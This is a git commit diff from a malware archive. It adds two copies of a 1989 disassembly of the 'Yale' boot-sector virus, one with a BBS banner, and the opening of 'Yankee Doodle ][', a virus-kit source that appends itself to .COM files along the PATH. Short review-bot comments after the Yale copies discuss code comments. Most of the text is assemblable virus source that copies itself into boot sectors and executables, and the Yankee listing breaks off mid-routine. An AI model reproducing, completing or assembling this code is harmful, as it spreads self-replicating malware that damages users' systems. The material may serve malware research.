re-organize

This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,365 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
page 65,132
title The 'Yale' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Yale' Virus º
; º Disassembled by Joe Hirst, April 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus consists of a boot sector only on a floppy disk.
; The original boot sector is kept at track thirty-nine, head zero,
; sector eight.
; The disassembly has been tested by re-assembly using MASM 5.0
; Note that this does not create an identical program, as the original
; appears to have been assembled with A86
; MASM would not assemble the instruction at offset 003CH (7C3CH)
; This instruction is undefined on an 8088/8086, and illegal
; on a 80286/80386.
; The program requires an origin address of 7C00H for the first sector
; to load and run as a boot sector
; System variables are defined in either RAM or BOOT (or both)
; depending on the segment used by the program
RAM SEGMENT AT 400H
; System RAM fields
ORG 13H
BW0413 DW ? ; Total RAM size
ORG 17H
BB0417 DB ? ; Key toggles
ORG 72H
BW0472 DW ? ; System reset word
RAM ENDS
BOOT SEGMENT AT 0
; Interrupt addresses
ORG 24H
BW0024 DW ? ; Interrupt 9 offset
BW0026 DW ? ; Interrupt 9 segment
ORG 64H
BW0064 DW ? ; Interrupt 19H offset
BW0066 DW ? ; Interrupt 19H segment
; System RAM fields
ORG 410H
DW0410 DW ? ; System configuration
ORG 413H
DW0413 DW ? ; Total RAM size
; BIOS field
ORG 0E502H
DWE502 DW ?
BOOT ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING
START: CLI
XOR AX,AX ; \ Set SS to zero
MOV SS,AX ; /
MOV SP,7C00H ; Set stack before boot area
STI
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV AX,BW0413 ; Get size of RAM
MUL BX ; Convert to paragraphs
SUB AX,07E0H ; Subtract address after boot area
MOV ES,AX ; Target segment
ASSUME DS:CODE
PUSH CS ; \ Set DS to CS
POP DS ; /
CMP DI,3456H ; Simulated system reset?
JNE BP0010 ; Branch if not
DEC GENNUM[7C00H] ; Decrement generation number
BP0010: MOV SI,SP ; \ Address boot sector area
MOV DI,SI ; /
MOV CX,0200H ; 512 bytes to move
CLD
REPZ MOVSB ; Copy virus to high core
MOV SI,CX ; Address offset zero
MOV DI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
REPZ MOVSB ; Save first 32 interrupt pointers
CALL BP0030 ; Install interrupt 9 routine
PUSH ES ; \ Transfer to high core
; POP CS ; /
DB 0FH ; This is the previous instruction
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,SP ; Address boot sector area
MOV DX,CX ; A-drive, head zero
MOV CX,2708H ; Track 39, sector 8
MOV AX,0201H ; Read one sector
INT 13H ; Disk I/O
BP0020: JB BP0020 ; Loop on error
JMP BP0190
; Install interrupt 9 routine
BP0030: DEC DW0413 ; Decrement RAM size
MOV SI,OFFSET BW0024 ; Address INT 9 pointer
MOV DI,OFFSET INT_09+7C00H ; Target far jump
MOV CX,4 ; 4 bytes to copy
CLI
REPZ MOVSB ; Copy far address
MOV BW0024,OFFSET BP0050+7C00H ; Install new offset
MOV BW0026,ES ; Install new segment
STI
RET
; Ctrl-Alt-Del depressed - acknowledge keyboard signal
BP0040: IN AL,61H ; Get port B
MOV AH,AL ; Save current state
OR AL,80H ; Turn top bit on
OUT 61H,AL ; Set port B
XCHG AL,AH ; Get original state
OUT 61H,AL ; Reset port B
JMP SHORT BP0110
; Format table for track 39, head zero, 8 sectors (unused)
DB 027H, 000H, 001H, 002H
DB 027H, 000H, 002H, 002H
DB 027H, 000H, 003H, 002H
DB 027H, 000H, 004H, 002H
DB 027H, 000H, 005H, 002H
DB 027H, 000H, 006H, 002H
DB 027H, 000H, 007H, 002H
DB 027H, 000H, 008H, 002H
; Rubbish
DB 024H, 000H, 0ADH, 07CH, 0A3H, 026H, 000H, 059H
DB 05FH, 05EH, 007H, 01FH, 058H, 09DH, 0EAH, 011H
DB 011H, 011H, 011H
; Interrupt 9 routine
BP0050: PUSHF
STI
PUSH AX
PUSH BX
PUSH DS
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV BX,KYSTAT[7C00H] ; Get Ctrl & Alt key states
IN AL,60H ; Get keyboard token
MOV AH,AL ; Save keyboard token
AND AX,887FH
CMP AL,1DH ; Was key Ctrl?
JNE BP0060 ; Branch if not
MOV BL,AH ; Save Ctrl key state
JMP SHORT BP0080
BP0060: CMP AL,38H ; Was key Alt?
JNE BP0070 ; Branch if not
MOV BH,AH ; Save Alt key state
JMP SHORT BP0080
BP0070: CMP BX,0808H ; Are Ctrl & Alt depressed?
JNE BP0080 ; Branch if not
CMP AL,17H ; Is key I?
JE BP0100 ; Branch if yes
CMP AL,53H ; Is key Del?
JE BP0040 ; Branch if yes
BP0080: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
BP0090: POP DS
POP BX
POP AX
POPF
DB 0EAH ; Far jump to original INT 9
INT_09 DW 0E987H, 0F000H
; Pass on Ctrl-Alt-I
BP0100: JMP BP0240 ; Ctrl-Alt-I
; Ctrl-Alt-Del depressed - main processing
BP0110: MOV DX,03D8H ; VDU mode control address
MOV AX,0800H ; Delay eight cycles
OUT DX,AL ; Disable display
CALL BP0250 ; Delay
MOV KYSTAT[7C00H],AX ; Reset Ctrl & Alt key states
MOV AL,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Set cursor address function
XOR DX,DX ; Row zero, column zero
MOV BH,DH ; Page zero
INT 10H ; VDU I/O
MOV AH,1 ; Set cursor size function
MOV CX,0607H ; Cursor lines 6 to 7
INT 10H ; VDU I/O
MOV AX,0420H ; Delay 4 cycles
CALL BP0250 ; Delay
CLI
OUT 20H,AL ; End of interrupt
MOV ES,CX ; Address segment zero
MOV DI,CX ; Address offset zero
MOV SI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
CLD
REPZ MOVSB ; Restore first 32 interrupt pointers
MOV DS,CX ; Address zero
MOV BW0064,OFFSET BP0130+7C00H ; Install Int 19H offset
MOV BW0066,CS ; Install Int 19H segment
ASSUME DS:RAM
MOV AX,0040H ; \ Address RAM area
MOV DS,AX ; /
MOV BB0417,AH ; Set key toggles off
INC BW0413 ; Restore RAM size
PUSH DS
ASSUME DS:BOOT
MOV AX,0F000H ; \ Address BIOS
MOV DS,AX ; /
CMP DWE502,21E4H ; Is BIOS instruction IN AL,21H?
POP DS
JE BP0120 ; Branch if yes
INT 19H ; Disk bootstrap
BP0120: DB 0EAH ; Far jump to BIOS routine
DW 0E502H, 0F000H
; Interrupt 19H routine
ASSUME DS:BOOT
BP0130: XOR AX,AX ; \ Set DS to zero
MOV DS,AX ; /
MOV AX,DW0410 ; Get system configuration
TEST AL,1 ; Is there a floppy disk
JNZ BP0150 ; Branch if yes
BP0140: PUSH CS ; \ Set ES to CS
POP ES ; /
CALL BP0030 ; Install interrupt 9 routine
INT 18H ; Basica (IBM only)
BP0150: MOV CX,4 ; Retry four times
BP0160: PUSH CX ; Save retry count
MOV AH,0 ; Reset disk sub-system
INT 13H ; Disk I/O
JB BP0170 ; Branch if error
MOV AX,0201H ; Read one sector
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,7C00H ; Boot sector buffer
MOV CX,1 ; Track zero, sector one
INT 13H ; Disk I/O
BP0170: POP CX ; Retrieve retry count
JNB BP0180 ; Branch if no error
LOOP BP0160 ; Retry
JMP BP0140
BP0180: CMP DI,3456H ; Simulated system reset?
JNE BP0200 ; Branch if not
BP0190: DB 0EAH ; Far jump to boot sector area
DW 7C00H, 0
BP0200: MOV SI,7C00H ; Boot sector area
MOV CX,OFFSET INT_09 ; Length to compare
MOV DI,SI ; Virus offset
PUSH CS ; \ Set ES to CS
POP ES ; /
CLD
REPZ CMPSB ; Is boot sector infected?
JE BP0220 ; Branch if yes
INC ES:GENNUM[7C00H] ; Increment generation number
MOV BX,7C7AH ; Address format table
MOV DX,0 ; Head zero, drive zero
MOV CH,27H ; Track 39
MOV AH,5 ; Format track
JMP SHORT BP0210 ; This line was probably an INT 13H
JB BP0230 ; Error branch for deleted INT 13H
BP0210: MOV ES,DX ; \ Write from boot sector area
MOV BX,7C00H ; /
MOV CL,8 ; Sector eight
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
PUSH CS ; \ Set ES to CS
POP ES ; /
JB BP0230 ; Branch if error
MOV CX,1 ; Track zero, sector one
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
JB BP0230 ; Branch if error
BP0220: MOV DI,3456H ; Signal simulated system reset
INT 19H ; Disk bootstrap
BP0230: CALL BP0030 ; Install interrupt 9 routine
DEC ES:GENNUM[7C00H] ; Decrement generation number
JMP BP0190
; Ctrl-Alt-I
ASSUME DS:CODE
BP0240: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
MOV AX,GENNUM[7C00H] ; Get generation number
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV BW0472,AX ; Generation to system reset word
JMP BP0090 ; Pass on to original interrupt
; Delay
BP0250: SUB CX,CX ; Maximum count
BP0260: LOOP BP0260 ; Delay loop
SUB AH,1 ; Decrement count
JNZ BP0260 ; Repeat loop
RET
DB 027H, 000H, 008H, 002H ; Last sector of format table
GENNUM DW 016H ; Generation number
KYSTAT DW 0 ; Ctrl & Alt key states
DB 027H, 000H, 008H, 002H ; Last sector of format table
CODE ENDS
END START
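Review bot: Apart from the BBS banner in the first 23 comment lines, this listing is the same Yale disassembly that is added again in the next file section, so the archive now carries two copies; if both are intentional, a one-line comment in this copy naming the other and why it is kept would save the next reader a diff. On the code itself, the self-loop `BP0020: JB BP0020 ; Loop on error` after the INT 13H read of track 39 sector 8 deserves a sharper comment, because it is not a retry but a deliberate hang of the machine: `; Read error: spin forever (no retry, no fallback boot)`. The same wording applies to the duplicate copy.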

@@ -0,0 +1,341 @@
page 65,132
title The 'Yale' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Yale' Virus º
; º Disassembled by Joe Hirst, April 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The virus consists of a boot sector only on a floppy disk.
; The original boot sector is kept at track thirty-nine, head zero,
; sector eight.
; The disassembly has been tested by re-assembly using MASM 5.0
; Note that this does not create an identical program, as the original
; appears to have been assembled with A86
; MASM would not assemble the instruction at offset 003CH (7C3CH)
; This instruction is undefined on an 8088/8086, and illegal
; on a 80286/80386.
; The program requires an origin address of 7C00H for the first sector
; to load and run as a boot sector
; System variables are defined in either RAM or BOOT (or both)
; depending on the segment used by the program
RAM SEGMENT AT 400H
; System RAM fields
ORG 13H
BW0413 DW ? ; Total RAM size
ORG 17H
BB0417 DB ? ; Key toggles
ORG 72H
BW0472 DW ? ; System reset word
RAM ENDS
BOOT SEGMENT AT 0
; Interrupt addresses
ORG 24H
BW0024 DW ? ; Interrupt 9 offset
BW0026 DW ? ; Interrupt 9 segment
ORG 64H
BW0064 DW ? ; Interrupt 19H offset
BW0066 DW ? ; Interrupt 19H segment
; System RAM fields
ORG 410H
DW0410 DW ? ; System configuration
ORG 413H
DW0413 DW ? ; Total RAM size
; BIOS field
ORG 0E502H
DWE502 DW ?
BOOT ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING
START: CLI
XOR AX,AX ; \ Set SS to zero
MOV SS,AX ; /
MOV SP,7C00H ; Set stack before boot area
STI
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV AX,BW0413 ; Get size of RAM
MUL BX ; Convert to paragraphs
SUB AX,07E0H ; Subtract address after boot area
MOV ES,AX ; Target segment
ASSUME DS:CODE
PUSH CS ; \ Set DS to CS
POP DS ; /
CMP DI,3456H ; Simulated system reset?
JNE BP0010 ; Branch if not
DEC GENNUM[7C00H] ; Decrement generation number
BP0010: MOV SI,SP ; \ Address boot sector area
MOV DI,SI ; /
MOV CX,0200H ; 512 bytes to move
CLD
REPZ MOVSB ; Copy virus to high core
MOV SI,CX ; Address offset zero
MOV DI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
REPZ MOVSB ; Save first 32 interrupt pointers
CALL BP0030 ; Install interrupt 9 routine
PUSH ES ; \ Transfer to high core
; POP CS ; /
DB 0FH ; This is the previous instruction
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,SP ; Address boot sector area
MOV DX,CX ; A-drive, head zero
MOV CX,2708H ; Track 39, sector 8
MOV AX,0201H ; Read one sector
INT 13H ; Disk I/O
BP0020: JB BP0020 ; Loop on error
JMP BP0190
; Install interrupt 9 routine
BP0030: DEC DW0413 ; Decrement RAM size
MOV SI,OFFSET BW0024 ; Address INT 9 pointer
MOV DI,OFFSET INT_09+7C00H ; Target far jump
MOV CX,4 ; 4 bytes to copy
CLI
REPZ MOVSB ; Copy far address
MOV BW0024,OFFSET BP0050+7C00H ; Install new offset
MOV BW0026,ES ; Install new segment
STI
RET
; Ctrl-Alt-Del depressed - acknowledge keyboard signal
BP0040: IN AL,61H ; Get port B
MOV AH,AL ; Save current state
OR AL,80H ; Turn top bit on
OUT 61H,AL ; Set port B
XCHG AL,AH ; Get original state
OUT 61H,AL ; Reset port B
JMP SHORT BP0110
; Format table for track 39, head zero, 8 sectors (unused)
DB 027H, 000H, 001H, 002H
DB 027H, 000H, 002H, 002H
DB 027H, 000H, 003H, 002H
DB 027H, 000H, 004H, 002H
DB 027H, 000H, 005H, 002H
DB 027H, 000H, 006H, 002H
DB 027H, 000H, 007H, 002H
DB 027H, 000H, 008H, 002H
; Rubbish
DB 024H, 000H, 0ADH, 07CH, 0A3H, 026H, 000H, 059H
DB 05FH, 05EH, 007H, 01FH, 058H, 09DH, 0EAH, 011H
DB 011H, 011H, 011H
; Interrupt 9 routine
BP0050: PUSHF
STI
PUSH AX
PUSH BX
PUSH DS
PUSH CS ; \ Set DS to CS
POP DS ; /
ASSUME DS:CODE
MOV BX,KYSTAT[7C00H] ; Get Ctrl & Alt key states
IN AL,60H ; Get keyboard token
MOV AH,AL ; Save keyboard token
AND AX,887FH
CMP AL,1DH ; Was key Ctrl?
JNE BP0060 ; Branch if not
MOV BL,AH ; Save Ctrl key state
JMP SHORT BP0080
BP0060: CMP AL,38H ; Was key Alt?
JNE BP0070 ; Branch if not
MOV BH,AH ; Save Alt key state
JMP SHORT BP0080
BP0070: CMP BX,0808H ; Are Ctrl & Alt depressed?
JNE BP0080 ; Branch if not
CMP AL,17H ; Is key I?
JE BP0100 ; Branch if yes
CMP AL,53H ; Is key Del?
JE BP0040 ; Branch if yes
BP0080: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
BP0090: POP DS
POP BX
POP AX
POPF
DB 0EAH ; Far jump to original INT 9
INT_09 DW 0E987H, 0F000H
; Pass on Ctrl-Alt-I
BP0100: JMP BP0240 ; Ctrl-Alt-I
; Ctrl-Alt-Del depressed - main processing
BP0110: MOV DX,03D8H ; VDU mode control address
MOV AX,0800H ; Delay eight cycles
OUT DX,AL ; Disable display
CALL BP0250 ; Delay
MOV KYSTAT[7C00H],AX ; Reset Ctrl & Alt key states
MOV AL,3 ; Mode three
INT 10H ; VDU I/O
MOV AH,2 ; Set cursor address function
XOR DX,DX ; Row zero, column zero
MOV BH,DH ; Page zero
INT 10H ; VDU I/O
MOV AH,1 ; Set cursor size function
MOV CX,0607H ; Cursor lines 6 to 7
INT 10H ; VDU I/O
MOV AX,0420H ; Delay 4 cycles
CALL BP0250 ; Delay
CLI
OUT 20H,AL ; End of interrupt
MOV ES,CX ; Address segment zero
MOV DI,CX ; Address offset zero
MOV SI,7B80H ; Address interrupt save area
MOV CX,0080H ; 128 bytes to move
CLD
REPZ MOVSB ; Restore first 32 interrupt pointers
MOV DS,CX ; Address zero
MOV BW0064,OFFSET BP0130+7C00H ; Install Int 19H offset
MOV BW0066,CS ; Install Int 19H segment
ASSUME DS:RAM
MOV AX,0040H ; \ Address RAM area
MOV DS,AX ; /
MOV BB0417,AH ; Set key toggles off
INC BW0413 ; Restore RAM size
PUSH DS
ASSUME DS:BOOT
MOV AX,0F000H ; \ Address BIOS
MOV DS,AX ; /
CMP DWE502,21E4H ; Is BIOS instruction IN AL,21H?
POP DS
JE BP0120 ; Branch if yes
INT 19H ; Disk bootstrap
BP0120: DB 0EAH ; Far jump to BIOS routine
DW 0E502H, 0F000H
; Interrupt 19H routine
ASSUME DS:BOOT
BP0130: XOR AX,AX ; \ Set DS to zero
MOV DS,AX ; /
MOV AX,DW0410 ; Get system configuration
TEST AL,1 ; Is there a floppy disk
JNZ BP0150 ; Branch if yes
BP0140: PUSH CS ; \ Set ES to CS
POP ES ; /
CALL BP0030 ; Install interrupt 9 routine
INT 18H ; Basica (IBM only)
BP0150: MOV CX,4 ; Retry four times
BP0160: PUSH CX ; Save retry count
MOV AH,0 ; Reset disk sub-system
INT 13H ; Disk I/O
JB BP0170 ; Branch if error
MOV AX,0201H ; Read one sector
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV BX,7C00H ; Boot sector buffer
MOV CX,1 ; Track zero, sector one
INT 13H ; Disk I/O
BP0170: POP CX ; Retrieve retry count
JNB BP0180 ; Branch if no error
LOOP BP0160 ; Retry
JMP BP0140
BP0180: CMP DI,3456H ; Simulated system reset?
JNE BP0200 ; Branch if not
BP0190: DB 0EAH ; Far jump to boot sector area
DW 7C00H, 0
BP0200: MOV SI,7C00H ; Boot sector area
MOV CX,OFFSET INT_09 ; Length to compare
MOV DI,SI ; Virus offset
PUSH CS ; \ Set ES to CS
POP ES ; /
CLD
REPZ CMPSB ; Is boot sector infected?
JE BP0220 ; Branch if yes
INC ES:GENNUM[7C00H] ; Increment generation number
MOV BX,7C7AH ; Address format table
MOV DX,0 ; Head zero, drive zero
MOV CH,27H ; Track 39
MOV AH,5 ; Format track
JMP SHORT BP0210 ; This line was probably an INT 13H
JB BP0230 ; Error branch for deleted INT 13H
BP0210: MOV ES,DX ; \ Write from boot sector area
MOV BX,7C00H ; /
MOV CL,8 ; Sector eight
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
PUSH CS ; \ Set ES to CS
POP ES ; /
JB BP0230 ; Branch if error
MOV CX,1 ; Track zero, sector one
MOV AX,0301H ; Write one sector
INT 13H ; Disk I/O
JB BP0230 ; Branch if error
BP0220: MOV DI,3456H ; Signal simulated system reset
INT 19H ; Disk bootstrap
BP0230: CALL BP0030 ; Install interrupt 9 routine
DEC ES:GENNUM[7C00H] ; Decrement generation number
JMP BP0190
; Ctrl-Alt-I
ASSUME DS:CODE
BP0240: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states
MOV AX,GENNUM[7C00H] ; Get generation number
ASSUME DS:RAM
MOV BX,0040H ; \ Address RAM area
MOV DS,BX ; /
MOV BW0472,AX ; Generation to system reset word
JMP BP0090 ; Pass on to original interrupt
; Delay
BP0250: SUB CX,CX ; Maximum count
BP0260: LOOP BP0260 ; Delay loop
SUB AH,1 ; Decrement count
JNZ BP0260 ; Repeat loop
RET
DB 027H, 000H, 008H, 002H ; Last sector of format table
GENNUM DW 016H ; Generation number
KYSTAT DW 0 ; Ctrl & Alt key states
DB 027H, 000H, 008H, 002H ; Last sector of format table
CODE ENDS
END START
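Review bot: The format-track request prepared at `MOV AH,5 ; Format track` is never issued, because the `JMP SHORT BP0210` directly after it skips the INT 13H the disassembler believes was removed, which makes the following `JB BP0230` unreachable and leaves the table addressed by `MOV BX,7C7AH` (and its two trailing copies after BP0260) as dead data that BX is overwritten before using. The `(unused)` tag on the table should say this explicitly so nobody reads it as a live formatting payload: `; Format table for track 39, head zero, 8 sectors (dead: the AH=5 INT 13H that used it was removed, see BP0200)`. Presumably the sector-8 write at BP0210 then relies on track 39 already being formatted; a note there, `; Assumes track 39 is already formatted`, would make that visible.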
@@ -0,0 +1,342 @@
; YANKEE2.ASM -- Yankee Doodle ][
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 0 ; Appending Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call search_files ; Find and infect a file
call search_files ; Find and infect another file
call get_hour
cmp ax,0011h ; Did the function return 17?
jle skip00 ; If less that or equal, skip effect
cmp ax,0013h ; Did the function return 19?
jge skip00 ; If greater than or equal, skip effect
jmp short strt00 ; Success -- skip jump
skip00: jmp end00 ; Skip the routine
strt00: lea si,[di + data00] ; SI points to data
get_note: mov bx,[si] ; Load BX with the frequency
or bx,bx ; Is BX equal to zero?
je play_tune_done ; If it is we are finished
mov ax,034DDh ;
mov dx,0012h ;
cmp dx,bx ;
jnb new_note ;
div bx ; This bit here was stolen
mov bx,ax ; from the Turbo C++ v1.0
in al,061h ; library file CS.LIB. I
test al,3 ; extracted sound() from the
jne skip_an_or ; library and linked it to
or al,3 ; an .EXE file, then diassembled
out 061h,al ; it. Basically this turns
mov al,0B6h ; on the speaker at a certain
out 043h,al ; frequency.
skip_an_or: mov al,bl ;
out 042h,al ;
mov al,bh ;
out 042h,al ;
mov bx,[si + 2] ; BX holds duration value
xor ah,ah ; BIOS get time function
int 1Ah
add bx,dx ; Add the time to the length
wait_loop: int 1Ah ; Get the time again (AH = 0)
cmp dx,bx ; Is the delay over?
jne wait_loop ; Repeat until it is
in al,061h ; Stolen from the nosound()
and al,0FCh ; procedure in Turbo C++ v1.0.
out 061h,al ; This turns off the speaker.
new_note: add si,4 ; SI points to next note
jmp short get_note ; Repeat with the next note
play_tune_done:
end00:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
mov bx,di ; BX points to the virus
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call traverse_path ; Start the traversal
traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
lea dx,[bx + com_mask] ; DX points to "*.COM"
push di
mov di,bx
call find_files ; Try to infect a .COM file
mov bx,di
pop di
jnc done_searching ; If successful the exit
jmp short traversal_loop ; Keep checking the PATH
done_searching: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not then exit
stc ; Set the carry flag for failure
at_least_tried: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db "*.COM",0 ; Mask for all .COM files
search_files endp
traverse_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment
xor di,di ; DI holds the starting offset
find_path: lea si,[bx + path_string] ; SI points to "PATH="
lodsb ; Load the "P" into AL
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of "PATH="
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking
mov word ptr [bx + path_ad],di ; Save the PATH address
mov word ptr [bx + path_ad + 2],es ; Save the PATH's segment
ret ; Return to caller
path_string db "PATH=" ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
traverse_path endp
found_subdir proc near
lds si,dword ptr [bx + path_ad] ; DS:SI points to PATH
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_subdir: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_subdir ; Keep transfering characters
moved_last_one: xor si,si ; Zero SI to signal completion
moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the path address
ret ; Return to caller
found_subdir endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
